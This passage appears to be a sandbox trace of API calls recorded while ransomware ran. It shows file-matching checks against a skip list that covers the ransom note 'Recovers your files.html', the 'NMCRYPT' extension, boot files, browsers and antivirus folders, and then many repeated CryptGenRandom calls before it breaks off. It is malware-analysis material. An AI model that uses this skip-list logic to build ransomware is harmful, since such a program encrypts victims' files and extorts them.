lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.347] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.348] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.348] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\de-DE\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.348] strlen (_Str="NMoreira") returned 0x8 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.348] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.349] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.350] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.351] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: 